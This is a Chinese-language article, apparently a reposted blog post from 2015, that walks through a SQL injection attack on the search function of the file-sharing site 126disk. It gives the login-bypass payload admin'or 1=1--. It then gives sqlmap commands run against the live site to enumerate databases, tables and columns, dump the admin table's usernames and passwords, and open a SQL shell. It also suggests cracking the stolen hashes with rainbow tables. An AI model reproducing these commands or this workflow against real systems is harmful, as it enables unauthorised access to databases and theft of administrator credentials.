精选国内外互联网行业最新文章及报告,让网友获得最新的海内外互联网动态
当前位置:主页 > 互联网 > 网络安全 >

126disk网盘sql注入漏洞

2015-01-20 11:46 来源: 编辑:admin
sql注入点有很多,有用户登录注入,如万能密码admin’or 1=1– ;还有Web程序中的一些交互注入,如查询之类。有关sql注入详细信息见www.bitsCN.com/Article/201209/153277.html。由于126disk网盘对用户输入的查询关键字,没有实行过滤,造成sql注入漏洞,可以探测数据库信息,查看数据库数据,甚至把整个数据库搞到本地,即拖库。
 
我们在126disk网盘搜索框里输入helloworld’,查看结果,http://pan.baidu.com/share/link?shareid=63647&uk=537055152,直接把错误报出来,说明对我们输入的单引号进行了解析,web程序的查询sql语法,报出错误。我们可以手动去探测,利用union这个命令去返回我们想要的数据。这里用sqlmap自动化去探测。
 
1, 找到注入点的url,这里的查询用的get方法,url为http://so.126disk.com/search?key=helloworld, Backtrack中的sqlmap默认路径为/pentest/database/sqlmap,也可以自己去网上免费下载。命令:
 
./sqlmap.py -u http://so.126disk.com/search?key=helloworld –dbs,该条命令是探测数据库用的。易踪网探测结果如图:




,我们看到数据库为mysql,操作系统为windows2003,服务器为IIS6,用的php的技术,探测到126disk这个数据库,information_schema库是mysql的系统库,存有一些用户,和表等信息。
 
2,  探测表名,我们探测到了数据库名,接下来探测表名。命令:
 
./sqlmap.py -u http://so.126disk.com/search?key=helloworld -D 126disk –table,易踪网探测结果如下:


,我们可以看到共24张表。
 
3, 探测列名,探测到了数据库和表名,我们接下来探测感兴趣的表的列名。我们来探测disk_admin表中的列名。命令:
 
./sqlmap.py -u http://so.126disk.com/search?key=helloworld -D 126disk -T disk_admin –columns,易踪网探测结果如下:


,我们可以看到该表中由我们感兴趣的user和pass列。
 
4, 探测数据,接下来我们探测数据库中的用户数据,命令:./sqlmap.py -u http://so.126disk.com/search?key=helloworld -D 126disk -T disk_admin -C user,pass –dump,这样我们就可以探测disk_admin中的user和pass列的数据了。这里探测结果就不贴图了。现在的网站一般都不会保存明文密码,一般时md5或者sha1加密,有时还可能会有salt值,想看明文的话,去下个彩虹表去破解吧。
 
sqlmap还有些特别有意思的参数,如–current-user,可以查看当前登录数据库的用户,–sql-shell是建立一个sql的shell,有了这个shell我们就可以方便的运行sql命令了。命令:
 
./sqlmap.py -u http://so.126disk.com/search?key=helloworld –sql-shell,截图如:


标签
你喜欢的文章
返回首页
扫描微信
返回顶部